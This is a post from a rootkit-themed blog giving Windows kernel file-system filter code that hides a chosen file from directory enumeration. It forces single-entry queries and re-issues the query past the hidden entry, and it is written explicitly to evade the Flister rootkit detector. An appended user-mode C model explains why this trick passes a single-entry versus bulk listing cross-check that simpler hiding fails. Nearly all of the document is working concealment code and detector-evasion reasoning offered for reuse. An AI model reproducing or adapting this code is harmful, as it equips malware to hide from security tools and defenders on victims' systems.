ROOTKIT
Because the OS isn't enough!
Saturday July 31st
Proper way to hide files/directories aka the FsFilter way aka bypass Flister
By: valerino

Heya, this is my answer to Flister..... Since Joanna said she hasn't seen any "file hiding" done in a proper way, here's my code as
requested.

It's just a snippet, so you have of course to readapt it to your needs. It needs an fs filter catching IRP_MJ_DIRECTORY_CONTROL.

cowabunga,
valerio


/*
 * Declarations added so the snippet compiles inside a legacy (pre-minifilter)
 * file system filter. FILTER_DEVICE_EXTENSION, TargetDirFileObject and the
 * FILE_TO_HIDE placeholder are assumed names for the filter's own state; the
 * original snippet used them without showing their definitions.
 */
#include <ntifs.h>

typedef struct _FILTER_DEVICE_EXTENSION {
    PDEVICE_OBJECT AttachedDevice;      /* the FSD device object we sit on top of */
} FILTER_DEVICE_EXTENSION, *PFILTER_DEVICE_EXTENSION;

/* File object of the directory holding the hidden file, saved at init time.
 * NULL means "hide a matching name in every directory". */
extern PFILE_OBJECT TargetDirFileObject;

#ifndef FILE_TO_HIDE
#define FILE_TO_HIDE L"example.sys"     /* placeholder: set to the real target name */
#endif

NTSTATUS
UtilSetEventCompletionRoutine(
   PDEVICE_OBJECT DeviceObject,
   PIRP Irp,
   PVOID Context)
{
    UNREFERENCED_PARAMETER(DeviceObject);
    UNREFERENCED_PARAMETER(Irp);

    // Wake the waiting dispatch routine. STATUS_MORE_PROCESSING_REQUIRED stops
    // I/O manager completion here, so the dispatch routine still owns the IRP,
    // can inspect the returned entry and must complete the IRP itself.
    KeSetEvent((PKEVENT) Context, IO_NO_INCREMENT, FALSE);
    return STATUS_MORE_PROCESSING_REQUIRED;
}

NTSTATUS FsDirectoryControlDispatch (PDEVICE_OBJECT DeviceObject, PIRP Irp)
{
    NTSTATUS                    Status;
    KEVENT                      Event;
    FILE_INFORMATION_CLASS      FileInfo;
    PVOID                       Buffer;
    UNICODE_STRING              Name;
    UNICODE_STRING              Target;
    ULONG                       NameLength;
    ULONG                       NameOffset;
    PFILE_OBJECT                FileObject;
    ULONG                       resendcount = 0; // hack needed for norton lame filter compatibility
    PIO_STACK_LOCATION          IrpSp = IoGetCurrentIrpStackLocation (Irp);
    PFILTER_DEVICE_EXTENSION    DeviceExtension = (PFILTER_DEVICE_EXTENSION) DeviceObject->DeviceExtension;

    // init event
    KeInitializeEvent(&Event, NotificationEvent, FALSE);

    if (IrpSp->MinorFunction != IRP_MN_QUERY_DIRECTORY)
    {
        // skip every other minor irp (IRP_MN_NOTIFY_CHANGE_DIRECTORY etc.)
        IoSkipCurrentIrpStackLocation(Irp);
        return IoCallDriver(DeviceExtension->AttachedDevice, Irp);
    }

__resend :
    // Force one entry per request. The buffer then never holds more than the
    // single entry we inspect, so a hidden entry is dropped by asking the FSD
    // for the next one instead of unlinking it from a NextEntryOffset chain.
    // Cost: one IRP round trip per directory entry for every caller.
    IrpSp->Flags |= SL_RETURN_SINGLE_ENTRY;
    IoCopyCurrentIrpStackLocationToNext(Irp);
    IoSetCompletionRoutine(Irp, UtilSetEventCompletionRoutine, &Event, TRUE, TRUE, TRUE);
    KeClearEvent(&Event);
    Status = IoCallDriver(DeviceExtension->AttachedDevice, Irp);

    if (Status == STATUS_PENDING)
    {
        KeWaitForSingleObject(&Event, Executive, KernelMode, FALSE, NULL);
        Status = Irp->IoStatus.Status;
    }

    if (Status != STATUS_SUCCESS)
    {
        goto __exit;
    }

    // check buffer, in case mask the entry by skipping this entry index
    IrpSp = IoGetCurrentIrpStackLocation(Irp);

    // this is the currently examined directory fileobject
    FileObject = IrpSp->FileObject;
    FileInfo = IrpSp->Parameters.QueryDirectory.FileInformationClass;
    // the FSD may have been given an MDL instead of the raw user pointer
    Buffer = Irp->MdlAddress
           ? MmGetSystemAddressForMdlSafe(Irp->MdlAddress, NormalPagePriority)
           : Irp->UserBuffer;
    if (!Buffer || Irp->IoStatus.Information == 0)
    {
        goto __exit;
    }

    // get filename for every case: every information class a caller can ask
    // for must be handled, or a query using the unhandled class shows the file
    switch (FileInfo)
    {
        case FileFullDirectoryInformation:
            NameOffset = FIELD_OFFSET(FILE_FULL_DIR_INFORMATION, FileName[0]);
            NameLength = ((PFILE_FULL_DIR_INFORMATION) Buffer)->FileNameLength;
        break;

        case FileDirectoryInformation:
            NameOffset = FIELD_OFFSET(FILE_DIRECTORY_INFORMATION, FileName[0]);
            NameLength = ((PFILE_DIRECTORY_INFORMATION) Buffer)->FileNameLength;
        break;

        case FileNamesInformation:
            NameOffset = FIELD_OFFSET(FILE_NAMES_INFORMATION, FileName[0]);
            NameLength = ((PFILE_NAMES_INFORMATION) Buffer)->FileNameLength;
        break;

        case FileBothDirectoryInformation:
            NameOffset = FIELD_OFFSET(FILE_BOTH_DIR_INFORMATION, FileName[0]);
            NameLength = ((PFILE_BOTH_DIR_INFORMATION) Buffer)->FileNameLength;
        break;

        case FileIdBothDirectoryInformation:   // XP and later; not in the original snippet
            NameOffset = FIELD_OFFSET(FILE_ID_BOTH_DIR_INFORMATION, FileName[0]);
            NameLength = ((PFILE_ID_BOTH_DIR_INFORMATION) Buffer)->FileNameLength;
        break;

        case FileIdFullDirectoryInformation:   // XP and later; not in the original snippet
            NameOffset = FIELD_OFFSET(FILE_ID_FULL_DIR_INFORMATION, FileName[0]);
            NameLength = ((PFILE_ID_FULL_DIR_INFORMATION) Buffer)->FileNameLength;
        break;

        default:
            // unknown class: pass the entry through untouched
            goto __exit;
    }

    // pointer arithmetic on PUCHAR, not through a 32-bit ULONG cast
    Name.Buffer = (PWCHAR) ((PUCHAR) Buffer + NameOffset);
    Name.Length = Name.MaximumLength = (USHORT) NameLength;
    RtlInitUnicodeString(&Target, FILE_TO_HIDE);

    // hide file: length-checked, case-insensitive exact name match (stands in
    // for the Utilwcsstrsize helper the original snippet called but did not include)
    if (RtlEqualUnicodeString(&Name, &Target, TRUE))
    {
        // this is an extra check, which involves you save at initialization time the fileobject of the directory in which
        // the hidden file resides. Comparing directories FsContexts (FsContext are unique for the same object),
        // you can be sure that you're hiding the right target file. Without this check, it would hide
        // \windows\system32\drivers\FILE_TO_HIDE, \windows\FILE_TO_HIDE, \bla\FILE_TO_HIDE, etc....
        if (TargetDirFileObject == NULL ||
            FileObject->FsContext == TargetDirFileObject->FsContext)
        {
            resendcount++;
            if (resendcount > 1)    // compatibility hack for norton filter: after one resend the entry is let through
            {
                goto __exit;
            }
            // continue the FSD's scan where it stopped: a restart flag on the
            // caller's original request must not be replayed, or the FSD would
            // hand back the same (hidden) first entry again
            IrpSp->Flags &= ~SL_RESTART_SCAN;
            goto __resend;
        }
    }

__exit:
    // complete the irp and return
    Status = Irp->IoStatus.Status;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return Status;
}
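Why the force-single-entry-and-resend trick survives a Flister-style check, as an added example that is not valerino's code and does not run in the kernel: a user-mode C model of NtQueryDirectoryFile behind two hiding filters. Filter A does the usual thing, rewriting NextEntryOffset to unlink the target from a multi-entry buffer; filter B does what the snippet above does, always asking the FSD for one entry and re-issuing the query when that entry is the target. The detector compares a one-entry-at-a-time listing with a bulk listing, which is the single-entry part of what Flister exercises (it also varies the information class, which this model leaves out). NAMES_INFO mirrors only the FILE_NAMES_INFORMATION fields the model needs; the directory contents, the name hidden.sys and all function names are constructed for this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Only the FILE_NAMES_INFORMATION fields this model needs. */
typedef struct {
    uint32_t NextEntryOffset;   /* bytes to the next entry, 0 on the last */
    uint32_t FileIndex;
    uint32_t FileNameLength;    /* bytes of UTF-16LE, no terminator */
    uint16_t FileName[];
} NAMES_INFO;

#define ALIGN8(x) (((x) + 7u) & ~7u)
#define BUFSZ 4096

/* Constructed directory listing that the lower FSD hands back. */
static const char *const kEntries[] = {".", "..", "ntoskrnl.exe", "hidden.sys", "hal.dll"};
enum { NENTRIES = 5 };
static const char *const kHidden = "hidden.sys";

typedef size_t (*query_fn)(size_t *cursor, int single, uint8_t *buf);

/* Lower FSD: emit entries from *cursor (the scan position the FSD keeps per
 * handle), one only if single is set; returns the number written. */
static size_t fsd_query(size_t *cursor, int single, uint8_t *buf) {
    size_t off = 0, n = 0;
    NAMES_INFO *prev = NULL;
    while (*cursor < NENTRIES && !(single && n == 1)) {
        const char *nm = kEntries[(*cursor)++];
        size_t len = strlen(nm);
        NAMES_INFO *e = (NAMES_INFO *)(buf + off);
        e->NextEntryOffset = 0;
        e->FileIndex = (uint32_t)*cursor;
        e->FileNameLength = (uint32_t)(len * 2);
        for (size_t i = 0; i < len; i++) e->FileName[i] = (uint16_t)nm[i];  /* ASCII -> UTF-16LE */
        if (prev) prev->NextEntryOffset = (uint32_t)((uint8_t *)e - (uint8_t *)prev);
        prev = e;
        off += ALIGN8(offsetof(NAMES_INFO, FileName) + len * 2);
        n++;
    }
    return n;
}

/* Exact, length-checked name compare (the kernel code above also checks
 * FileNameLength before looking at the characters). */
static int name_is(const NAMES_INFO *e, const char *s) {
    size_t len = strlen(s);
    if (e->FileNameLength != len * 2) return 0;
    for (size_t i = 0; i < len; i++) if (e->FileName[i] != (uint16_t)s[i]) return 0;
    return 1;
}

/* Filter A: hide by pointing the predecessor's NextEntryOffset past the
 * target. The first entry has no predecessor, so a caller asking for one
 * entry at a time receives the target untouched. */
static size_t filter_unlink(size_t *cursor, int single, uint8_t *buf) {
    size_t n = fsd_query(cursor, single, buf);
    NAMES_INFO *prev = NULL, *e = n ? (NAMES_INFO *)buf : NULL;
    while (e) {
        NAMES_INFO *next = e->NextEntryOffset ? (NAMES_INFO *)((uint8_t *)e + e->NextEntryOffset) : NULL;
        if (prev && name_is(e, kHidden)) {
            prev->NextEntryOffset = next ? (uint32_t)((uint8_t *)next - (uint8_t *)prev) : 0;
            n--;
        } else prev = e;
        e = next;
    }
    return n;
}

/* Filter B, the post's method: always ask the FSD for a single entry and,
 * when it is the target, re-issue the query so the caller gets the next
 * entry; the FSD's per-handle scan position makes the resend continue. */
static size_t filter_resend(size_t *cursor, int single, uint8_t *buf) {
    size_t n;
    (void)single;   /* SL_RETURN_SINGLE_ENTRY is forced whatever the caller asked */
    do n = fsd_query(cursor, 1, buf); while (n && name_is((NAMES_INFO *)buf, kHidden));
    return n;
}

/* Walk a whole directory through q; returns the entries seen, flags the target. */
static size_t enumerate(query_fn q, int single, int *saw_hidden) {
    uint64_t raw[BUFSZ / 8];            /* 8-byte aligned backing store */
    uint8_t *buf = (uint8_t *)raw;
    size_t cursor = 0, total = 0;
    *saw_hidden = 0;
    while (q(&cursor, single, buf) > 0)
        for (NAMES_INFO *e = (NAMES_INFO *)buf;; e = (NAMES_INFO *)((uint8_t *)e + e->NextEntryOffset)) {
            total++;
            if (name_is(e, kHidden)) *saw_hidden = 1;
            if (!e->NextEntryOffset) break;
        }
    return total;
}

/* Flister-style cross-check: a one-entry-at-a-time listing must agree with a
 * bulk listing. Filter A fails it, filter B passes. */
static int detect_hiding(query_fn q) {
    int s1, s2;
    return enumerate(q, 0, &s1) != enumerate(q, 1, &s2);
}
```

Against the constructed directory, the bulk listing shows four entries under either filter, but the single-entry listing shows five (hidden.sys included) under filter A and four under filter B, so only filter A is flagged. The price of filter B is visible in the model too: every caller, hidden file or not, is served one entry per request.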
